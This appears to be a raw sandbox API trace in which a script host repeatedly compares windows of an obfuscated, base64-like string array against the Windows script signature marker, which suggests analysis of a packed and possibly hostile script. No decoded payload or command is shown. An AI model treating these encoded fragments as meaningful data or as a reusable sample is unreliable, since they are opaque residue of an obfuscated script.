	[0078.473] wcsncmp (_String1="wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.473] wcsncmp (_String1="qtowqjClg==','w5Mcwr/DvcOsK2cuBQ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0078.473] wcsncmp (_String1="towqjClg==','w5Mcwr/DvcOsK2cuBQ==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0078.473] wcsncmp (_String1="owqjClg==','w5Mcwr/DvcOsK2cuBQ=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0078.473] wcsncmp (_String1="wqjClg==','w5Mcwr/DvcOsK2cuBQ==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.473] wcsncmp (_String1="qjClg==','w5Mcwr/DvcOsK2cuBQ==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0078.473] wcsncmp (_String1="jClg==','w5Mcwr/DvcOsK2cuBQ==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0078.474] wcsncmp (_String1="Clg==','w5Mcwr/DvcOsK2cuBQ==','wr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0078.474] wcsncmp (_String1="lg==','w5Mcwr/DvcOsK2cuBQ==','wrv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0078.474] wcsncmp (_String1="g==','w5Mcwr/DvcOsK2cuBQ==','wrvD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0078.474] wcsncmp (_String1="==','w5Mcwr/DvcOsK2cuBQ==','wrvDp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0078.474] wcsncmp (_String1="=','w5Mcwr/DvcOsK2cuBQ==','wrvDps", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0078.474] wcsncmp (_String1="','w5Mcwr/DvcOsK2cuBQ==','wrvDpsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0078.474] wcsncmp (_String1=",'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0078.474] wcsncmp (_String1="'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0078.474] wcsncmp (_String1="w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.474] wcsncmp (_String1="5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0078.474] wcsncmp (_String1="Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0078.474] wcsncmp (_String1="cwr/DvcOsK2cuBQ==','wrvDpsOqD8KNw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0078.474] wcsncmp (_String1="wr/DvcOsK2cuBQ==','wrvDpsOqD8KNwp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.474] wcsncmp (_String1="r/DvcOsK2cuBQ==','wrvDpsOqD8KNwpb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0078.474] wcsncmp (_String1="/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0078.474] wcsncmp (_String1="DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0078.474] wcsncmp (_String1="vcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0078.474] wcsncmp (_String1="cOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0078.474] wcsncmp (_String1="OsK2cuBQ==','wrvDpsOqD8KNwpbCjh8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0078.474] wcsncmp (_String1="sK2cuBQ==','wrvDpsOqD8KNwpbCjh8pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0078.474] wcsncmp (_String1="K2cuBQ==','wrvDpsOqD8KNwpbCjh8pas", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0078.474] wcsncmp (_String1="2cuBQ==','wrvDpsOqD8KNwpbCjh8pasK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0078.474] wcsncmp (_String1="cuBQ==','wrvDpsOqD8KNwpbCjh8pasKg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0078.474] wcsncmp (_String1="uBQ==','wrvDpsOqD8KNwpbCjh8pasKgV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0078.474] wcsncmp (_String1="BQ==','wrvDpsOqD8KNwpbCjh8pasKgV8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 53
	[0078.474] wcsncmp (_String1="Q==','wrvDpsOqD8KNwpbCjh8pasKgV8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0078.474] wcsncmp (_String1="==','wrvDpsOqD8KNwpbCjh8pasKgV8Oz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0078.474] wcsncmp (_String1="=','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0078.474] wcsncmp (_String1="','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0078.474] wcsncmp (_String1=",'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0078.474] wcsncmp (_String1="'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0078.474] wcsncmp (_String1="wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.474] wcsncmp (_String1="rvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0078.474] wcsncmp (_String1="vDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7j", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0078.474] wcsncmp (_String1="DpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0078.474] wcsncmp (_String1="psOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0078.474] wcsncmp (_String1="sOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0078.474] wcsncmp (_String1="OqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0078.474] wcsncmp (_String1="qD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Ow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0078.475] wcsncmp (_String1="D8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Oww", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0078.475] wcsncmp (_String1="8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0078.475] wcsncmp (_String1="KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwrt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0078.475] wcsncmp (_String1="NwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0078.475] wcsncmp (_String1="wpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.475] wcsncmp (_String1="pbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0078.475] wcsncmp (_String1="bCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0078.475] wcsncmp (_String1="Cjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0078.475] wcsncmp (_String1="jh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0078.475] wcsncmp (_String1="h8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0078.475] wcsncmp (_String1="8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0078.475] wcsncmp (_String1="pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0078.475] wcsncmp (_String1="asKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0078.475] wcsncmp (_String1="sKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0078.475] wcsncmp (_String1="KgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0078.475] wcsncmp (_String1="gV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0078.475] wcsncmp (_String1="V8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0078.475] wcsncmp (_String1="8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0078.475] wcsncmp (_String1="Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0078.475] wcsncmp (_String1="zb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0078.475] wcsncmp (_String1="b1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0078.475] wcsncmp (_String1="1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw6", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0078.475] wcsncmp (_String1="xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0078.475] wcsncmp (_String1="Zw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0078.475] wcsncmp (_String1="w7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.475] wcsncmp (_String1="7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0078.475] wcsncmp (_String1="jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0078.475] wcsncmp (_String1="Du8OwwrtSXDnDgMOwa0XCr8OAw69Dw79y", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0078.475] wcsncmp (_String1="u8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0078.475] wcsncmp (_String1="8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0078.475] wcsncmp (_String1="OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0078.475] wcsncmp (_String1="wwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.475] wcsncmp (_String1="wrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.475] wcsncmp (_String1="rtSXDnDgMOwa0XCr8OAw69Dw79yA8OW',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0078.475] wcsncmp (_String1="tSXDnDgMOwa0XCr8OAw69Dw79yA8OW','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0078.475] wcsncmp (_String1="SXDnDgMOwa0XCr8OAw69Dw79yA8OW','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 70
	[0078.475] wcsncmp (_String1="XDnDgMOwa0XCr8OAw69Dw79yA8OW','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0078.475] wcsncmp (_String1="DnDgMOwa0XCr8OAw69Dw79yA8OW','w5/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0078.476] wcsncmp (_String1="nDgMOwa0XCr8OAw69Dw79yA8OW','w5/C", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0078.476] wcsncmp (_String1="DgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0078.476] wcsncmp (_String1="gMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0078.476] wcsncmp (_String1="MOwa0XCr8OAw69Dw79yA8OW','w5/Cn8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0078.476] wcsncmp (_String1="Owa0XCr8OAw69Dw79yA8OW','w5/Cn8KK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0078.476] wcsncmp (_String1="wa0XCr8OAw69Dw79yA8OW','w5/Cn8KKb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.476] wcsncmp (_String1="a0XCr8OAw69Dw79yA8OW','w5/Cn8KKbM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0078.476] wcsncmp (_String1="0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35
	[0078.476] wcsncmp (_String1="XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0078.476] wcsncmp (_String1="Cr8OAw69Dw79yA8OW','w5/Cn8KKbMK5H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0078.476] wcsncmp (_String1="r8OAw69Dw79yA8OW','w5/Cn8KKbMK5Hs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0078.476] wcsncmp (_String1="8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0078.476] wcsncmp (_String1="OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOe", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0078.476] wcsncmp (_String1="Aw69Dw79yA8OW','w5/Cn8KKbMK5HsOef", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0078.476] wcsncmp (_String1="w69Dw79yA8OW','w5/Cn8KKbMK5HsOefs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.476] wcsncmp (_String1="69Dw79yA8OW','w5/Cn8KKbMK5HsOefsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 41
	[0078.476] wcsncmp (_String1="9Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0078.476] wcsncmp (_String1="Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0078.476] wcsncmp (_String1="w79yA8OW','w5/Cn8KKbMK5HsOefsOg',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.476] wcsncmp (_String1="79yA8OW','w5/Cn8KKbMK5HsOefsOg','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0078.476] wcsncmp (_String1="9yA8OW','w5/Cn8KKbMK5HsOefsOg','M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0078.476] wcsncmp (_String1="yA8OW','w5/Cn8KKbMK5HsOefsOg','ME", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108
	[0078.476] wcsncmp (_String1="A8OW','w5/Cn8KKbMK5HsOefsOg','MEr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0078.476] wcsncmp (_String1="8OW','w5/Cn8KKbMK5HsOefsOg','MErC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0078.476] wcsncmp (_String1="OW','w5/Cn8KKbMK5HsOefsOg','MErCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0078.476] wcsncmp (_String1="W','w5/Cn8KKbMK5HsOefsOg','MErCsE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74
	[0078.476] wcsncmp (_String1="','w5/Cn8KKbMK5HsOefsOg','MErCsEP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0078.476] wcsncmp (_String1=",'w5/Cn8KKbMK5HsOefsOg','MErCsEPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0078.476] wcsncmp (_String1="'w5/Cn8KKbMK5HsOefsOg','MErCsEPDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0078.476] wcsncmp (_String1="w5/Cn8KKbMK5HsOefsOg','MErCsEPDhc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.476] wcsncmp (_String1="5/Cn8KKbMK5HsOefsOg','MErCsEPDhcK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0078.476] wcsncmp (_String1="/Cn8KKbMK5HsOefsOg','MErCsEPDhcKa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0078.476] wcsncmp (_String1="Cn8KKbMK5HsOefsOg','MErCsEPDhcKac", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0078.476] wcsncmp (_String1="n8KKbMK5HsOefsOg','MErCsEPDhcKacR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0078.476] wcsncmp (_String1="8KKbMK5HsOefsOg','MErCsEPDhcKacRH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0078.476] wcsncmp (_String1="KKbMK5HsOefsOg','MErCsEPDhcKacRHC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0078.476] wcsncmp (_String1="KbMK5HsOefsOg','MErCsEPDhcKacRHCm", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0078.476] wcsncmp (_String1="bMK5HsOefsOg','MErCsEPDhcKacRHCmA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0078.476] wcsncmp (_String1="MK5HsOefsOg','MErCsEPDhcKacRHCmA=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0078.477] wcsncmp (_String1="K5HsOefsOg','MErCsEPDhcKacRHCmA==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0078.477] wcsncmp (_String1="5HsOefsOg','MErCsEPDhcKacRHCmA=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0078.477] wcsncmp (_String1="HsOefsOg','MErCsEPDhcKacRHCmA==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0078.477] wcsncmp (_String1="sOefsOg','MErCsEPDhcKacRHCmA==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0078.477] wcsncmp (_String1="OefsOg','MErCsEPDhcKacRHCmA==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0078.477] wcsncmp (_String1="efsOg','MErCsEPDhcKacRHCmA==','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0078.477] wcsncmp (_String1="fsOg','MErCsEPDhcKacRHCmA==','woz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0078.477] wcsncmp (_String1="sOg','MErCsEPDhcKacRHCmA==','wozD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0078.477] wcsncmp (_String1="Og','MErCsEPDhcKacRHCmA==','wozDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0078.477] wcsncmp (_String1="g','MErCsEPDhcKacRHCmA==','wozDhs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0078.477] wcsncmp (_String1="','MErCsEPDhcKacRHCmA==','wozDhsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0078.477] wcsncmp (_String1=",'MErCsEPDhcKacRHCmA==','wozDhsKi", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0078.477] wcsncmp (_String1="'MErCsEPDhcKacRHCmA==','wozDhsKiw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0078.477] wcsncmp (_String1="MErCsEPDhcKacRHCmA==','wozDhsKiwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0078.477] wcsncmp (_String1="ErCsEPDhcKacRHCmA==','wozDhsKiwrP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0078.477] wcsncmp (_String1="rCsEPDhcKacRHCmA==','wozDhsKiwrPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0078.477] wcsncmp (_String1="CsEPDhcKacRHCmA==','wozDhsKiwrPDl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0078.477] wcsncmp (_String1="sEPDhcKacRHCmA==','wozDhsKiwrPDl8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0078.477] wcsncmp (_String1="EPDhcKacRHCmA==','wozDhsKiwrPDl8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0078.477] wcsncmp (_String1="PDhcKacRHCmA==','wozDhsKiwrPDl8Kx", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0078.477] wcsncmp (_String1="DhcKacRHCmA==','wozDhsKiwrPDl8KxF", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0078.477] wcsncmp (_String1="hcKacRHCmA==','wozDhsKiwrPDl8KxFA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0078.477] wcsncmp (_String1="cKacRHCmA==','wozDhsKiwrPDl8KxFAY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0078.477] wcsncmp (_String1="KacRHCmA==','wozDhsKiwrPDl8KxFAY=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0078.477] wcsncmp (_String1="acRHCmA==','wozDhsKiwrPDl8KxFAY='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0078.477] wcsncmp (_String1="cRHCmA==','wozDhsKiwrPDl8KxFAY=',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0078.477] wcsncmp (_String1="RHCmA==','wozDhsKiwrPDl8KxFAY=','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0078.477] wcsncmp (_String1="HCmA==','wozDhsKiwrPDl8KxFAY=','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0078.477] wcsncmp (_String1="CmA==','wozDhsKiwrPDl8KxFAY=','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0078.477] wcsncmp (_String1="mA==','wozDhsKiwrPDl8KxFAY=','woH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96
	[0078.477] wcsncmp (_String1="A==','wozDhsKiwrPDl8KxFAY=','woHD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0078.477] wcsncmp (_String1="==','wozDhsKiwrPDl8KxFAY=','woHDt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0078.477] wcsncmp (_String1="=','wozDhsKiwrPDl8KxFAY=','woHDt2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0078.477] wcsncmp (_String1="','wozDhsKiwrPDl8KxFAY=','woHDt2Z", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0078.477] wcsncmp (_String1=",'wozDhsKiwrPDl8KxFAY=','woHDt2Zc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0078.477] wcsncmp (_String1="'wozDhsKiwrPDl8KxFAY=','woHDt2ZcP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0078.477] wcsncmp (_String1="wozDhsKiwrPDl8KxFAY=','woHDt2ZcPM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.478] wcsncmp (_String1="ozDhsKiwrPDl8KxFAY=','woHDt2ZcPMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0078.478] wcsncmp (_String1="zDhsKiwrPDl8KxFAY=','woHDt2ZcPMOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0078.478] wcsncmp (_String1="DhsKiwrPDl8KxFAY=','woHDt2ZcPMOsG", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0078.478] wcsncmp (_String1="hsKiwrPDl8KxFAY=','woHDt2ZcPMOsGX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0078.478] wcsncmp (_String1="sKiwrPDl8KxFAY=','woHDt2ZcPMOsGXt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0078.478] wcsncmp (_String1="KiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0078.478] wcsncmp (_String1="iwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0078.478] wcsncmp (_String1="wrPDl8KxFAY=','woHDt2ZcPMOsGXtZQc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0078.478] wcsncmp (_String1="rPDl8KxFAY=','woHDt2ZcPMOsGXtZQcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0078.478] wcsncmp (_String1="PDl8KxFAY=','woHDt2ZcPMOsGXtZQcOI", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0078.478] wcsncmp (_String1="Dl8KxFAY=','woHDt2ZcPMOsGXtZQcOIw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0078.478] wcsncmp (_String1="l8KxFAY=','woHDt2ZcPMOsGXtZQcOIwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0078.478] wcsncmp (_String1="8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0078.478] wcsncmp (_String1="KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0078.478] wcsncmp (_String1="xFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0078.478] wcsncmp (_String1="FAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57
